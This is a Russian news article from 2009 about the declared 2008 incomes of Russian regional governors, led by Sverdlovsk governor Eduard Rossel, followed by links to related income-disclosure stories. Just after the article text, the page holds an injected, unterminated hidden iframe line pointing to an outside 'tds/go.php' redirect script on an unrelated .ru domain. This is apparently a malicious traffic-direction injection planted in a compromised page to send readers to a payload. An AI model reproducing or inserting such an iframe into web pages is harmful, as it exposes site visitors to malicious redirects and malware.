08.05.2009, 13:23

Эдуард Россель лидирует в хит-параде самых богатых чиновников России

Губернатор Свердловской области Эдуард Россель занял лидирующее положение среди глав российских регионов по уровню доходов. Свердловский губернатор в 2008 году заработал более 11 миллионов рублей, то есть почти по 1 миллиону в месяц.

Для сравнения, чуть больше месячного дохода Эдуарда Росселя заработал за весь прошедший год губернатор Белгородской области Евгений Савченко — 1,2 миллиона рублей.

Напомним, в апреле Президент России Дмитрий Медведев опубликовал сведения о своих доходах и имуществе (доходы за год составили 4,1 миллиона рублей). Позже его примеру последовали председатель правительства Владимир Путин (4,7 млн.), ряд министров федерального правительства. Затем очередь дошла и до глав регионов.

Подводя предварительные итоги рейтинга заработков чиновников, можно констатировать, что у свердловчан есть повод для гордости: наш губернатор и в 71 год зарабатывает больше, чем «молодые» президент и премьер, вместе взятые.

Необходимо отметить, что ежемесячный доход Эдуарда Росселя в соответствии с областным бюджетом на 2009 год составляет «всего» 250 тысяч рублей, таким образом, за год губернатор на основном месте работы заработает только 3 миллиона рублей. Можно предположить, что сопоставимую сумму он получил и в прошлом году. Откуда взялись остальные 8 миллионов — в декларации, опубликованной «Областной газетой», не указано.

В этой связи стоит заметить, что доходы свердловского губернатора растут. Например, в 2006 году Россель заработал 8,624 миллиона рублей, 7 из которых были наградой губернатора за «творческую деятельность». Что скрывается под данной формулировкой — неясно.

Руководители соседних областей за прошлый год заработали в разы меньше свердловского главы. Например, основной доход губернатора Пермского края Олега Чиркунова составил 1,8 млн. рублей. А губернатор Челябинской области Петр Сумин, представивший в налоговые органы сведения о доходах еще в начале апреля, по основному месту работы заработал 3,9 миллиона, а трудовая пенсия челябинского губернатора составила 80 тыс. руб.

Губернатор «газового» ЯНАО Юрий Неёлов с учетом «северной» надбавки на основном месте работы заработал 5,5 миллиона и получил доход в размере 363 тыс. рублей от вкладов в банках, ценных бумаг и трудовой пенсии. Два других «северных» губернатора, Александр Филипенко (ХМАО) и Владимир Якушев (Тюменская область), заработали по 5,1 и 5,5 миллиона соответственно.

Самый низкий в УрФО доход у Олега Богомолова, губернатора Курганской области. Он в 2008 г. получил 1,867 миллиона рублей.

В целом по России средний уровень губернаторских годовых доходов колеблется от полутора до пяти миллионов рублей. Так, доход по основному месту работы в 2008 году у губернатора Пензенской области Василия Бочкарева составил 2,4 миллиона рублей, губернатор Нижегородской области Валерий Шанцев заработал 4,568 миллиона рублей, губернатор Оренбургской области Алексей Чернышев — 1,8 миллиона, а глава Ульяновской области Сергей Морозов получил в прошлом году 1,6 миллиона рублей.

Скромным оказался доход губернатора Санкт-Петербурга Валентины Матвиенко — 1,716 миллиона рублей.

Вплотную к Росселю подобрался губернатор Саратовской области Павел Ипатов, за прошлый год заработавший около 9 миллионов рублей.

Отметим, сведения о доходах опубликовали не все губернаторы, поскольку формально президент не обязал всех региональных глав в обязательном порядке отчитаться о личных заработках.
<iframe src="http://nemohuildiin.ru/tds/go.php

Похожие новости по теме
16.05.2013, 18:26

Администрация Куйвашева раскрыла доходы

Чиновники администрации губернатора Свердловской области и аппарата регионального правительства опубликовали сведения о доходах и имуществе. Самый богатый из госслужащих заработал за год около 6...

18.04.2013, 12:09

Губернатор Куйвашев оказался беднее жены

Губернатор Свердловской области Евгений Куйвашев опубликовал сведения о своих доходах и имуществе. За 2012 год глава области заработал 5 миллионов рублей — на 2 миллиона меньше, чем его супруга. ...

11.05.2012, 18:11

Мишарин оказался богаче Путина, но беднее жены

Губернатор Свердловской области Александр Мишарин опубликовал сведения о своих доходах за 2011 год. Кроме того, опубликована и информация о доходах его жены Инны. Сведения о доходах размещены на...

12.04.2012, 14:56

Путин беднее жены Шувалова в сто раз

Члены российского правительства опубликовали свои декларации о доходах за 2011 год. Если верить этой информации, то за прошлый год Владимир Путин заработал 3 миллиона 661 тысячу рублей — меньше, чем...

30.04.2010, 13:46

На двоих чета Мишариных зарабатывает почти 6,5 миллиона в год

Губернатор Свердловской области Александр Мишарин и его супруга Инна представили в соответствии с действующим законодательством данные о своих доходах и имеющемся имуществе. В прошлом году еще...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам